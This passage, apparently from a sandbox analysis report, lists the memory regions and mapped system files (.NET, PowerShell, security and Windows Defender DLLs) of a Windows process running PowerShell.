entry_point = 0x0 region_type = private name = "private_0x000000afa4480000" filename = "" Region: id = 662 start_va = 0x7ff7f57a0000 end_va = 0x7ff7f57affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57a0000" filename = "" Region: id = 663 start_va = 0x7ff8559e0000 end_va = 0x7ff855aedfff monitored = 1 entry_point = 0x7ff8559e1080 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 664 start_va = 0x2386b6b0000 end_va = 0x2386b6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b6b0000" filename = "" Region: id = 665 start_va = 0x2386d2e0000 end_va = 0x2386d3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d2e0000" filename = "" Region: id = 666 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 667 start_va = 0x7ff7f57b0000 end_va = 0x7ff7f57bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57b0000" filename = "" Region: id = 668 start_va = 0x2386cf00000 end_va = 0x2386cf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf00000" filename = "" Region: id = 669 start_va = 0x7ff865a20000 end_va = 0x7ff865a81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\65012908bad668fe7862ae251eb099a8\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\65012908bad668fe7862ae251eb099a8\\microsoft.powershell.security.ni.dll") Region: id = 670 start_va = 0x7ff7f57c0000 end_va = 0x7ff7f57cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57c0000" filename = "" Region: id = 671 start_va = 0x7ff864010000 end_va = 0x7ff86401bfff monitored = 0 entry_point = 0x7ff8640135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 672 start_va = 0x7ff86e0a0000 end_va = 0x7ff86e0ccfff monitored = 0 entry_point = 0x7ff86e0b9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 673 start_va = 0x2386d490000 end_va = 0x2386d58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d490000" filename = "" Region: id = 674 start_va = 0x2386cf00000 end_va = 0x2386cf01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386cf00000" filename = "" Region: id = 675 start_va = 0x2386d3f0000 end_va = 0x2386d3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d3f0000" filename = "" Region: id = 676 start_va = 0x2386d3f0000 end_va = 0x2386d3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d3f0000" filename = "" Region: id = 677 start_va = 0xafa4500000 end_va = 0xafa457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4500000" filename = "" Region: id = 678 start_va = 0xafa4580000 end_va = 0xafa45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4580000" filename = "" Region: id = 679 start_va = 0x7ff7f57d0000 end_va = 0x7ff7f57dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57d0000" filename = "" Region: id = 680 start_va = 0x7ff7f57e0000 end_va = 0x7ff7f57effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57e0000" filename = "" Region: id = 681 start_va = 0x7ff7f57f0000 end_va = 0x7ff7f57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f57f0000" filename = "" Region: id = 682 start_va = 0x7ff8558b0000 end_va = 0x7ff8559d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\2fe311002b76e58f2f89f897a32b62a2\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\2fe311002b76e58f2f89f897a32b62a2\\system.configuration.ni.dll") Region: id = 683 start_va = 0x7ff864110000 end_va = 0x7ff86411bfff monitored = 0 entry_point = 0x7ff8641118b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 684 start_va = 0x7ff86e7c0000 end_va = 0x7ff86e986fff monitored = 0 entry_point = 0x7ff86e81db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 685 start_va = 0x7ff86e4a0000 end_va = 0x7ff86e4affff monitored = 0 entry_point = 0x7ff86e4a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 686 start_va = 0x7ff86f180000 end_va = 0x7ff86f1d4fff monitored = 0 entry_point = 0x7ff86f197970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 687 start_va = 0xafa4600000 end_va = 0xafa467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4600000" filename = "" Region: id = 688 start_va = 0x2386d3f0000 end_va = 0x2386d3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d3f0000" filename = "" Region: id = 689 start_va = 0x2386d400000 end_va = 0x2386d410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386d400000" filename = "" Region: id = 690 start_va = 0x2386d420000 end_va = 0x2386d423fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 691 start_va = 0xafa4680000 end_va = 0xafa46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4680000" filename = "" Region: id = 692 start_va = 0x2386d590000 end_va = 0x2386d78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d590000" filename = "" Region: id = 693 start_va = 0x7ff86d420000 end_va = 0x7ff86d443fff monitored = 0 entry_point = 0x7ff86d423260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 694 start_va = 0x2386d420000 end_va = 0x2386d429fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 695 start_va = 0x2386d430000 end_va = 0x2386d433fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 696 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 697 start_va = 0x2386d430000 end_va = 0x2386d451fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 698 start_va = 0x2386d430000 end_va = 0x2386d451fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 699 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 700 start_va = 0x2386d430000 end_va = 0x2386d436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 701 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 702 start_va = 0x2386d430000 end_va = 0x2386d474fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 703 start_va = 0x2386d430000 end_va = 0x2386d474fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 704 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 705 start_va = 0x2386d430000 end_va = 0x2386d463fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 706 start_va = 0x2386d430000 end_va = 0x2386d463fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 707 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 708 start_va = 0x2386d430000 end_va = 0x2386d462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 709 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 710 start_va = 0x2386d430000 end_va = 0x2386d431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 711 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 712 start_va = 0x2386d430000 end_va = 0x2386d432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 713 start_va = 0x2386d430000 end_va = 0x2386d457fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 714 start_va = 0x2386d430000 end_va = 0x2386d43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d430000" filename = "" Region: id = 715 start_va = 0x2386d440000 end_va = 0x2386d44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d440000" filename = "" Region: id = 716 start_va = 0xafa4700000 end_va = 0xafa508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4700000" filename = "" Region: id = 717 start_va = 0x7ff86cda0000 end_va = 0x7ff86ce35fff monitored = 0 entry_point = 0x7ff86cdc5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 718 start_va = 0x2386d790000 end_va = 0x2386d7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 719 start_va = 0x2386d7f0000 end_va = 0x2386d8ccfff monitored = 0 entry_point = 0x2386d84e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 720 start_va = 0xafa5090000 end_va = 0xafa510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5090000" filename = "" Region: id = 721 start_va = 0x7ff86ba30000 end_va = 0x7ff86ba3ffff monitored = 0 entry_point = 0x7ff86ba351b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 722 start_va = 0x2386d430000 end_va = 0x2386d430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386d430000" filename = "" Region: id = 723 start_va = 0x7ff871750000 end_va = 0x7ff8717f6fff monitored = 0 entry_point = 0x7ff87175b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 724 start_va = 0x2386d440000 end_va = 0x2386d440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386d440000" filename = "" Region: id = 725 start_va = 0x7ff865da0000 end_va = 0x7ff865dbcfff monitored = 0 entry_point = 0x7ff865dae930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 726 start_va = 0x7ff84f7d0000 end_va = 0x7ff84f8aefff monitored = 0 entry_point = 0x7ff84f804ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 727 start_va = 0x2386d450000 end_va = 0x2386d451fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 728 start_va = 0x2386d7f0000 end_va = 0x2386d8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7f0000" filename = "" Region: id = 729 start_va = 0x7ff86db80000 end_va = 0x7ff86db9efff monitored = 0 entry_point = 0x7ff86db85d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 730 start_va = 0x2386d450000 end_va = 0x2386d47dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386d450000" filename = "" Region: id = 731 start_va = 0xafa5110000 end_va = 0xafa518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5110000" filename = "" Region: id = 732 start_va = 0xafa5190000 end_va = 0xafa51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5190000" filename = "" Region: id = 733 start_va = 0x7ff7f5800000 end_va = 0x7ff7f580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5800000" filename = "" Region: id = 734 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 735 start_va = 0x2386d7e0000 end_va = 0x2386d7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7e0000" filename = "" Region: id = 736 start_va = 0x7ff84f490000 end_va = 0x7ff84f7c9fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\system.runtime.serialization.ni.dll") Region: id = 737 start_va = 0x7ff8659f0000 end_va = 0x7ff865a14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\fec12741f35f039878753fdb29639f2c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\fec12741f35f039878753fdb29639f2c\\smdiagnostics.ni.dll") Region: id = 738 start_va = 0x7ff84f390000 end_va = 0x7ff84f481fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\193c832c4548f656b3e42825f211e823\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\193c832c4548f656b3e42825f211e823\\system.servicemodel.internals.ni.dll") Region: id = 739 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 740 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 741 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 742 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 743 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 744 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 745 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 746 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 747 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 748 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 749 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 750 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 751 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 752 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 753 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 754 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 755 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 756 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 757 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 758 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 759 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 760 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 761 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 762 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 763 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 764 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 765 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 766 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 767 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 768 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 769 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 770 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 771 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 772 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 773 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 774 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 775 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 776 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 777 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 778 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 779 start_va = 0x2386d8f0000 end_va = 0x2386d8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d8f0000" filename = "" Region: id = 780 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 781 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 782 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 783 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7c0000" filename = "" Region: id = 784 start_va = 0x2386d7d0000 end_va = 0x2386d7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7d0000" filename = "" Region: id = 785 start_va = 0x2386d790000 end_va = 0x2386d79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d790000" filename = "" Region: id = 786 start_va = 0x2386d7a0000 end_va = 0x2386d7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7a0000" filename = "" Region: id = 787 start_va = 0x2386d7b0000 end_va = 0x2386d7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d7b0000" filename = "" Region: id = 788 start_va = 0x2386d7c0000 end_va = 0x2386d7cffff monitored = 1 entry_point = 0x0 region_type = 